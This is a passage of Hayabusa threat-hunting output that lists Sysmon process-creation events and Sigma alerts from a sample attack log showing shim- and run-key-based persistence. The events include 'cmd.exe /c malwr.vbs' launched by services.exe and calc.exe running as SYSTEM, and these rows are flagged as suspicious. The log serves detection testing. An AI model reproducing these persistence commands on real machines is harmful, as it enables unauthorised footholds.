C:\Windows\System32\mmc.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:21:05.306 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:22:28.886 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\rundll32.exe"" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb : Path: C:\Windows\System32\rundll32.exe : User: 
EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:22:33.593 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\Windows NT\Accessories\WORDPAD.EXE"" ""C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb"" : Path: C:\Program Files\Windows NT\Accessories\wordpad.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Windows\system32\rundll32.exe"" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:26:05.397 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:26:08.852 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:31:05.509 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: 
C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:36:05.610 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:41:05.702 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:41:11.440 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:41:17.339 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\cmd.EXE /c malwr.vbs : Path: C:\Windows\System32\cmd.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:41:17.339 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Logoff : Path: C:\Windows\System32\gpscript.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k 
GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:41:18.290 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x1 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:41:18.410 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\servicing\TrustedInstaller.exe : Path: C:\Windows\servicing\TrustedInstaller.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:49.576 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:49.856 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:50.157 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000001 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:50.217 +09:00,PC01.example.corp,1,informational,Process Creation,Command: wininit.exe : Path: C:\Windows\System32\wininit.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:50.217 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000001 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:50.387 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000001 0000003c 
,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:50.427 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\services.exe : Path: C:\Windows\System32\services.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:50.467 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\lsass.exe : Path: C:\Windows\System32\lsass.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:50.497 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\lsm.exe : Path: C:\Windows\System32\lsm.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:51.308 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k DcomLaunch : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:51.599 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\VBoxService.exe : Path: C:\Windows\System32\VBoxService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:51.679 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:51.789 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:53.111 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k GPSvcGroup : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:53.571 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\spoolsv.exe : Path: C:\Windows\System32\spoolsv.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:53.922 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:53.922 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:54.102 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Startup : Path: C:\Windows\System32\gpscript.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,high,Abused Debug Privilege by Arbitrary Parent 
Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:54.182 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:54.182 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:54.593 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\freeSSHd\FreeSSHDService.exe"" : Path: C:\Program Files\freeSSHd\FreeSSHDService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:54.603 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:54.603 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:54.783 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""taskhost.exe"" : Path: 
C:\Windows\System32\taskhost.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:54.793 +09:00,PC01.example.corp,1,informational,Process Creation,Command: atbroker.exe : Path: C:\Windows\System32\AtBroker.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:54.813 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\slui.exe"" : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.224 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.224 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.404 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 
08:18:55.404 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.514 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.514 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.544 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.544 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.594 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.594 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process 
Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.654 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Logon : Path: C:\Windows\System32\gpscript.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.654 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\userinit.exe : Path: C:\Windows\System32\userinit.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.725 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE : Path: C:\Windows\explorer.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.805 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe $(Arg0) : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.835 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.835 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.965 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\Sysmon.exe : Path: C:\Windows\Sysmon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:56.055 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:56.055 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:56.376 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:56.376 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process 
Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:56.406 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wlms\wlms.exe : Path: C:\Windows\System32\wlms\wlms.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:56.626 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wbem\unsecapp.exe -Embedding : Path: C:\Windows\System32\wbem\unsecapp.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:57.237 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\UI0Detect.exe : Path: C:\Windows\System32\UI0Detect.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:57.627 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:58.278 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key"" : Path: C:\Windows\System32\cmd.exe : User: EXAMPLE\user01 : 
Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:58.288 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\PSEXESVC.exe"" : Path: C:\Windows\PSEXESVC.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:58.489 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: msg * ""hello from run key"" : Path: C:\Windows\System32\msg.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:58.989 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k 